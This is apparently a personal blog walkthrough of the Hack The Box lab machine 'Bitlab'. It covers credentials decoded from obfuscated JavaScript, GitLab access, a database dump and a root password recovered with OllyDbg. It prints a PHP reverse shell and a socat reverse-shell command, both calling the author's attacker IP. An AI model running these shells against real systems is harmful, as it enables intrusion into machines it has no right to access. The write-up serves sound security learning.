hackthebox.eu: Bitlab Walkthrough

Written By Alex

Another medium Linux box… let’s see how this one goes.

Typical nmap shows port 22 and 80 open. Time to go and check the website.

image2.png

So there is a Gitlab server here. I’ll follow up with Nikto and dirb scans to see what’s what.

image1.png

There’s a bunch of stuff in robots.txt so that’s interesting.

Looking around I found a user “clave” which may be useful. Time to go back to scanning.

image6.png
image7.png

Looking around a bit more I found a /help page on the site that had an interesting link to “Gitlab Login” which when I clicked on it did nothing. However when I moused over this I found some interesting things.

image4.png

There seems to be some javascript here but it doesn’t run. I see some special characters in there so I’ll try decoding. Nothing seemed to work with the whole string but with some more searching I found https://beautifier.io/ which makes things easier to read.

javascript: (function() {
    var _0x4b18 = ["\x76\x61\x6C\x75\x65", "\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64", "\x63\x6C\x61\x76\x65", "\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64", "\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78"];
    document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]] = _0x4b18[3];    document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]] = _0x4b18[5];
})()

Now I can see some chunks of stuff with \x76 etc. That looks like hex maybe? I’m not sure so I played around with BurpSuite for a bit. I ended up taking each bit of my “hex” and decoding it as ASCII hex. 

image8.png

Looks like nothing? Unless you take the out put \xc\xl\xa\xv\xe and remove the \x and you get… clave. Interesting. I’ll do some more and see where we end up.

javascript: (function() {
    var _0x4b18 = ["value", "user_login", "getElementById", "clave", "user_password", "11des0081x"];
    document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]] = _0x4b18[3];
    document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]] = _0x4b18[5];
})()

Now that looks promising. Back to the gitlab login to use these credentials and see what we get.

image3.png

Now I’m logged in as the developer clave!

It seems that I should be able to add a file via Git and then get what I need from here, but I’ll have to google some to find what I need. Looking at the Administrator Profile project a bit more closely I found that index.php there is the clave profile page from above. Knowing that I can add my own php page to the project I should be able to find it and navigate to it to get a shell. Let’s find out.

image11.png
image15.png 
<?php echo exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.15.173/4449 0>&1'");?>

After creating this file and merging it into the project, I can navigate to it under the /profile directory and get a shell back.

image21.png
image10.png

Success! Now I have a limited shell. Let’s see what I can do.

Running my favorite sudo -l command to list what I can run elevated I see the following.

image9.png

Git pull huh? That’s weird and I’ve never seen that before, back to researching.

/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.15.173:5550 - I could use this to get a fully interactive shell which gives me a bit of room to breathe. Caught this with socat file:`tty`,raw,echo=0 tcp-listen:5550 on my attacker machine.

After some additional work it turns out that this socat binary must have been put there by another tester… in hindsight this makes sense given the /tmp directory. When the machine was reset I lost that method. I could put it back, but let’s check other methods first. It was neat to use it and learn that new bit of knowledge.

I went back to web enumeration with my recovered credentials and found the /snippets directory. Going to this part of the site I found this code.

image10.png

Which looks like a connection to a database. I wonder if I can get the information to come back in a php page?

Eventually I got to this code:

<?php
$db_connection = pg_connect("host=localhost dbname=profiles user=profiles password=profiles");
$result = pg_query($db_connection, "SELECT * FROM profiles");
$arr = pg_fetch_all($result);
var_dump($arr);
?>

Which dumps some interesting data. But not a whole lot… bleh.

array(1) { [0]=> array(3) { ["id"]=> string(1) "1" ["username"]=> string(5) "clave" ["password"]=> string(22) "c3NoLXN0cjBuZy1wQHNz==" } } 

I’ll try this on my other open port (22: ssh) and what do ya know? Success!

image16.png

That gets us some access via SSH… and probably a user flag.

image17.png

Now back to enumeration and looking around as a user level access to this box.

Looking some more at RemoteConnection.exe and there needs to be some reverse engineering to figure out root through this program according to the forums, but I’m an absolute n00b when it comes to reversing, so this will be interesting. It seems that this program automates some sort of remote connection into what I am guessing is this system. It isn’t uncommon for administrators to make a program to streamline their connection to administer a server. I have definitely seen that before. The question is how to get to this information.

I read reverse engineering articles every week for literally a MONTH since I’m really not good at reversing at all. But here is the process that worked for me.

  1. Right click on CPU - main thread → Search for → All referenced text strings

  2. Set breakpoints on

    1. 004014B1 | PUSH RemoteCo.0040324C | ASCII “string too long”

    2. 00401565 | MOV EAX,RemoteCo.00403188 | ASCII "XRIBG0UCDh0HJRcIBh8EEk8aBwdQTAIERVIwFEQ4SDghJUsHJTw1TytWFkwPVgQ2RztS"

    3. 004015A4 | MOV EAX,RemoteCo.004031D0 | string=ASCII "parse"

  3. Debug → Restart

  4. F9 to run to our first break at the long ASCII string

image11.png

5. Then F8 (Step Over) until we are past the parse line. It’s not too far past there. Just keep pressing F8 until you get there. Keep an eye on the registers and the bottom right window while you do this. Something interesting should appear.

image19.png

6. AHA!

image1.png

7. Copy that line out to a text file and cut the password out.

0033FE50   00411C58  ASCII "-ssh root@gitlab.htb -pw "Qf7]8YSV.wDNF*[7d?j&eD4^""

This article was helpful in figuring out the step over trick. https://resources.infosecinstitute.com/in-depth-seh-exploit-writing-tutorial-using-ollydbg/#gref 

Time to test it out and cross our fingers…

image3.png
image20.png

And finally done. That was a BATTLE for me. Again, reversing has never really been my thing and the OSCP was a very long time ago to find buffer overflows. I’m not really sure why that technique worked more than others that I tried, but I’m happy that I rooted the machine the intended way. I’m very curious about the other method which was to use git pull with sudo from the www-data user to get directly to root, so I will be watching IppSec’s video as soon as this come out.

Thanks to Frey and thek for pushing me out of my comfort zone and making me figure out some reversing skills.

Items learned or remembered:

  • Recovering information from encoded strings

  • Git web interface usage to add files

  • File location and execution

  • Socat shell tty

  • PHP Postgresql usage and coding

  • OllyDbg

    • Code review basics

    • Setting and using breakpoints

    • Using step into, step over, and run

  • Persistence (just keep going)

  • Patience with research - if first you don’t succeed… read another blog

Alex
Previous

hackthebox.eu: Postman Walkthrough
Next

hackthebox.eu: Wall Walkthrough